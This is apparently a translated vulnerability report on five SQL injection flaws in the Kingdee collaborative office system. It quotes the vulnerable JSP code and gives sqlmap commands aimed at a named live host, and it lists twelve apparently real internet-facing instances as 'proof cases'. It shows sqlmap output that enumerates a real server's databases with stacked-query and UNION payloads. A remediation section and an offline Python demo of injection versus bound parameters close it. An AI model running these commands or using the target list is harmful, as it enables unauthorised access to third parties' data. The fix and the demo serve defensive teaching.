Kingdee collaborative office system has five high-risk SQL Injection Vulnerabilities
Vulnerable files (injectable parameter in brackets):
/kingdee/Template/TemplateEdit.jsp?RecordID=1  (RecordID)
/kingdee/Template/TemplateSave.jsp?FileName=1  (FileName; RecordID, Descript, c_class, def_process and template_img are concatenated the same way, see 0x2)
/kingdee/DocumentEdit.jsp?RecordID=1&UserName=1  (RecordID; Template is concatenated too, see 0x3)
/kingdee/DocumentSave.jsp?RecordID=1&Template=1&Subject=1&Author=1&FileDate=1&FileType=1&HTMLPath=1  (RecordID)
/kingdee/DocumentShow.jsp?Template=1&UserName=1  (Template)
All of the above can be exploited directly with sqlmap, no manual payload work needed:
0x1 /kingdee/Template/TemplateEdit.jsp vulnerable code

sysUtil.tools.weboffice.iDBManager2000 DbaObj = new sysUtil.tools.weboffice.iDBManager2000();
if (DbaObj.OpenConnection()) {
    // mRecordID is the RecordID request parameter, spliced straight into the SQL text
    String mSql = "Select * From Template_File Where RecordID='" + mRecordID + "'";
    try {
        result = DbaObj.ExecuteQuery(mSql);
        if (result.next()) {
            mRecordID    = result.getString("RecordID");
            mFileName    = result.getString("FileName");
            mFileType    = result.getString("FileType");
            mDescript    = result.getString("Descript");
            c_class      = result.getString("c_class");
            def_process  = result.getString("def_process");
            template_img = result.getString("template_img");
        }

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateEdit.jsp?RecordID=1"
0x2 /kingdee/Template/TemplateSave.jsp vulnerable code

String mRecordID   = request.getParameter("RecordID");
String mFileName   = request.getParameter("FileName");
String mDescript   = request.getParameter("Descript");
String c_class     = request.getParameter("c_class");
String def_process = request.getParameter("def_process");
String user_id      = PubFunc.toString(session.getAttribute("user_id"));
String default_tmpl = PubFunc.toString(request.getParameter("default_tmpl"));
String template_img = PubFunc.toString(request.getParameter("template_img"));
new Person().set_default_tmpl(default_tmpl, c_class, user_id, "", "gj", "");
sysUtil.tools.weboffice.iDBManager2000 DbaObj = new sysUtil.tools.weboffice.iDBManager2000();
if (DbaObj.OpenConnection()) {
    java.sql.PreparedStatement prestmt = null;
    // Every request parameter is concatenated into the UPDATE; c_class is not even quoted.
    // prepareStatement() is called on the already-built string, so it adds no protection.
    String mSql = "Update Template_File Set FileName = '" + mFileName + "',Descript = '" + mDescript
                + "',c_class=" + c_class + ",def_process='" + def_process
                + "',template_img='" + template_img + "' Where RecordID='" + mRecordID + "'";
    prestmt = DbaObj.Conn.prepareStatement(mSql);
    //DbaObj.Conn.setAutoCommit(true);
    prestmt.execute();
    //DbaObj.Conn.commit();
    prestmt.close();
}
DbaObj.CloseConnection();
response.sendRedirect("TemplateList.jsp");
%>

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateSave.jsp?FileName=1"
0x3 /kingdee/DocumentEdit.jsp vulnerable code

if (DbaObj.OpenConnection()) {
    try {
        String mSql = "";
        if (!mTemplate.equals("")) {
            TableCtrl tc = new TableCtrl();
            // Template parameter concatenated into the WHERE clause handed to getFieldValue()
            String t_mFileType = tc.getFieldValue("Template_File", "FileType", "RecordID='" + mTemplate + "'");
            if (t_mFileType != null && !t_mFileType.equals("")) mFileType = t_mFileType;
        }
        // RecordID parameter concatenated into the query
        mSql = "Select * From Document Where RecordID='" + mRecordID + "'";
        result = DbaObj.ExecuteQuery(mSql);

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/DocumentEdit.jsp?RecordID=1&UserName=1"
0x4 /kingdee/DocumentSave.jsp vulnerable code

String mRecordID = request.getParameter("RecordID");
if (mRecordID == null) mRecordID = "";
// Re-encoding the parameters as GBK is a charset fix, not input sanitisation
String mTemplate = new String(request.getParameter("Template").getBytes("gbk"));
String mSubject  = new String(request.getParameter("Subject").getBytes("gbk"));
String mAuthor   = new String(request.getParameter("Author").getBytes("gbk"));
String mFileDate = new String(request.getParameter("FileDate").getBytes("gbk"));
String mFileType = new String(request.getParameter("FileType").getBytes("gbk"));
String mHTMLPath = new String(request.getParameter("HTMLPath").getBytes("gbk"));
String mysql = "";
boolean ishave = false;
sysUtil.tools.weboffice.iDBManager2000 DbaObj = new sysUtil.tools.weboffice.iDBManager2000();
if (DbaObj.OpenConnection()) {
    // RecordID parameter concatenated into the query
    mysql = "SELECT * from Document Where RecordID='" + mRecordID + "'";
    //...
}

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/DocumentSave.jsp?RecordID=1&Template=1&Subject=1&Author=1&FileDate=1&FileType=1&HTMLPath=1" -p RecordID
0x5 /kingdee/DocumentShow.jsp vulnerable code

try {
    String mSql = "";
    if (!mTemplate.equals("")) {
        // Template parameter concatenated into the WHERE clause handed to getFieldValue()
        String t_mFileType = db.getFieldValue("Template_File", "FileType", "RecordID='" + mTemplate + "'");
        if (t_mFileType != null && !t_mFileType.equals("")) mFileType = t_mFileType;
    }

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/DocumentShow.jsp?Template=1&UserName=1"
Dumping data with sqlmap (output below):
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateEdit.jsp?RecordID=1" --dbs
Vulnerable instances (proof cases):
http://221.226.149.17:8080/kingdee/login/loginpage.jsp
http://122.139.60.103:800/kingdee/login/loginpage.jsp
http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp
http://222.179.238.182:8082/kingdee/login/loginpage2.jsp
http://222.134.77.23:8080/kingdee/login/loginpage.jsp
http://221.4.245.218:8080/kingdee/login/loginpage.jsp
http://220.189.244.202:8080/kingdee/login/loginpage.jsp
http://222.133.44.10:8080/kingdee/login/loginpage.jsp
http://223.95.183.6:8080/kingdee/login/loginpage.jsp
http://61.190.20.51/kingdee/login/loginpage.jsp
http://60.194.110.187/kingdee/login/loginpage.jsp
http://oa.roen.cn/kingdee/login/loginpage.jsp
sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/Template/TemplateEdit.jsp?RecordID=1" --dbs

sqlmap {1.0-dev-nongit-20150423}
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:59:58

[21:59:59] [INFO] resuming back-end DBMS 'microsoft sql server'
[21:59:59] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: RecordID (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: RecordID=1';WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: RecordID=1' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(104)+CHAR(81)+CHAR(120)+CHAR(109)+CHAR(90)+CHAR(122)+CHAR(97)+CHAR(81)+CHAR(74)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[22:00:00] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[22:00:00] [INFO] fetching database names
[22:00:00] [INFO] the SQL query used returns 6 entries
[22:00:00] [INFO] resumed: ghcoa
[22:00:00] [INFO] resumed: ghtest
[22:00:00] [INFO] resumed: master
[22:00:00] [INFO] resumed: model
[22:00:00] [INFO] resumed: msdb
[22:00:00] [INFO] resumed: tempdb
available databases [6]:
[*] ghcoa
[*] ghtest
[*] master
[*] model
[*] msdb
[*] tempdb

[22:00:00] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\oa.guanhao.com'

[*] shutting down at 22:00:00
Solution: Filter the input, or better, stop building SQL by string concatenation. All five pages read request parameters and splice them into the query text; TemplateSave.jsp even creates a PreparedStatement, but on the already concatenated string, which gives no protection. Use ? placeholders and bind RecordID, FileName, Template and the other parameters as values. Note that c_class in TemplateSave.jsp is concatenated without quotes, so a filter that only escapes single quotes would not stop injection there; numeric fields should be parsed to an integer before they reach the query.
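As an added example (not Kingdee's code and not part of the original report), the query construction from TemplateEdit.jsp and TemplateSave.jsp ported to Python with an in-memory SQLite database, so both the injection and the parameterised fix can be run offline. The table rows, the Users table and its password, and the two payloads are constructed for the demo; SQLite stands in for the SQL Server backend, so the UNION needs 7 columns here rather than the 13 sqlmap found, and WAITFOR DELAY has no SQLite counterpart.

```python
import sqlite3

# Constructed stand-in for the real schema: column names follow the
# TemplateEdit.jsp snippet; the rows, the Users table and its password are made up.
SCHEMA = """
CREATE TABLE Template_File (
    RecordID TEXT, FileName TEXT, FileType TEXT, Descript TEXT,
    c_class INTEGER, def_process TEXT, template_img TEXT
);
CREATE TABLE Users (UserName TEXT, Password TEXT);
INSERT INTO Template_File VALUES ('1', 'contract.doc', 'doc', 'Contract', 1, '', '');
INSERT INTO Template_File VALUES ('2', 'memo.doc',     'doc', 'Memo',     2, '', '');
INSERT INTO Users VALUES ('admin', 'constructed-password');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def template_edit_vulnerable(conn, record_id):
    # Same construction as TemplateEdit.jsp: the parameter becomes part of the SQL text.
    sql = "SELECT * FROM Template_File WHERE RecordID='" + record_id + "'"
    return conn.execute(sql).fetchall()


def template_edit_fixed(conn, record_id):
    # Bound parameter: the value travels separately from the statement text,
    # so it can only ever be compared against RecordID, never parsed as SQL.
    return conn.execute(
        "SELECT * FROM Template_File WHERE RecordID=?", (record_id,)
    ).fetchall()


def template_save_vulnerable(conn, record_id, file_name, descript, c_class):
    # Same shape as the UPDATE in TemplateSave.jsp (def_process and template_img
    # left out). c_class is concatenated without quotes, exactly as in the JSP.
    sql = ("UPDATE Template_File SET FileName='" + file_name + "',Descript='" + descript
           + "',c_class=" + c_class + " WHERE RecordID='" + record_id + "'")
    conn.execute(sql)
    conn.commit()


def template_save_fixed(conn, record_id, file_name, descript, c_class):
    conn.execute(
        "UPDATE Template_File SET FileName=?, Descript=?, c_class=? WHERE RecordID=?",
        (file_name, descript, c_class, record_id),
    )
    conn.commit()


def file_names(conn):
    return dict(conn.execute("SELECT RecordID, FileName FROM Template_File"))


# UNION payload in the style of the sqlmap output: the column count must match
# the target table (7 here, 13 in the real Template_File); rows from another
# table are appended to the legitimate result set.
UNION_PAYLOAD = ("1' UNION ALL SELECT UserName, Password, NULL, NULL, NULL, NULL, NULL "
                 "FROM Users--")

# Payload for the unquoted c_class slot. It contains no quote character at all,
# so escaping or stripping quotes would not stop it: it retargets the UPDATE to
# record 2 and comments out the original WHERE clause.
C_CLASS_PAYLOAD = "9 WHERE RecordID=2--"


def demo():
    conn = connect()
    leaked = template_edit_vulnerable(conn, UNION_PAYLOAD)  # 2 rows: record 1 plus admin credentials
    safe = template_edit_fixed(conn, UNION_PAYLOAD)         # []: no RecordID equals the payload string

    template_save_vulnerable(conn, "1", "x", "x", C_CLASS_PAYLOAD)
    after_vuln = file_names(conn)                           # record 2 overwritten, record 1 untouched

    conn = connect()
    template_save_fixed(conn, "1", "x", "x", C_CLASS_PAYLOAD)
    after_fixed = file_names(conn)                          # record 1 updated, payload stored as plain text
    return leaked, safe, after_vuln, after_fixed


if __name__ == "__main__":
    for item in demo():
        print(item)
```

Run it as a script to see the four results side by side. The c_class case is the one to keep in mind when evaluating the "filter" fix: the payload survives any quote-escaping routine untouched, while the bound-parameter version stores it harmlessly as a string.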